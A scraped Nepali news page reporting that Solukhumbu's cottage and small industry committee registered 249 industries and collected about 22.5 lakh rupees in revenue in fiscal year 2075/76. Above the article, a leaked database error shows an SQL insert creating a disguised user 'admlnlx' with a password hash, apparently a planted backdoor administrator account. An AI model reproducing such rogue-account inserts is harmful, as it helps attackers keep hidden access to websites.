WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlsySlGhowNkF7AD8LcRULKtoIaemH.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:50:50', '', 'admlnlx', 'admlnlx')

एक बर्षमा २ सय भन्दा बढी उद्योग दर्ता, २२ लाख भन्दा बढी राजास्व सङ्कलन – Gaule Khabar

एक बर्षमा २ सय भन्दा बढी उद्योग दर्ता, २२ लाख भन्दा बढी राजास्व सङ्कलन

एक बर्षमा २ सय भन्दा बढी उद्योग दर्ता, २२ लाख भन्दा बढी राजास्व सङ्कलन

गाउँले न्युज, १८ साउन, सोलुखुम्बु । घरेलु तथा साना विकास समिति सोलुखुम्बुमा आर्थिक वर्ष २०७५/०७६ भरी २४९ वटा उध्योग दर्ता भएको छ । दर्ता भएको उध्योग मध्ये साना उद्योग तर्फ ८५ र लघु उद्योग तर्फ १ सय ६४ रहेको घरेलु तथा साना बिकास समितिले जनाएको छ ।

उध्योग दर्ता माफर्त घरेलु तथा साना बिकास समिति सोलुखुम्बुले २२ लाख ५१ हजार २ सय ४५ रुपैया राजस्व संकलन गरेको हो ।

कार्यालयले बेरोजगार युवायुवतीलाई लक्षित गरी विभिन्न किसिमका सीप मुलक तालीम दिदै आएको पनि जनाएको छ । पछिल्लो समयमा रोजगारीका सिलसिलामा युवाहरु विदेश पलायन हुने संख्या बढ्दै गएका बेला घरेलु तथा साना विकास समितिले रोजगारी सिर्जना गने उद्देश्यले सीप मुलक तालिम दिर्दै आएको सुचना अधिकारी कुमार लामाले बताए ।

समितिले गत आर्थिक वर्षमा १ सय ५० वटा फम दर्ता गरेको छ भने ४७ वटा नविकरण गरेको छ । त्यस्तै पुजी वृद्धिमा ११ वटा रहेका छन भने २ वटाकोे नामसारी गरिएको र १ वटा फर्मको दर्ता खारेज भएको लामाले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका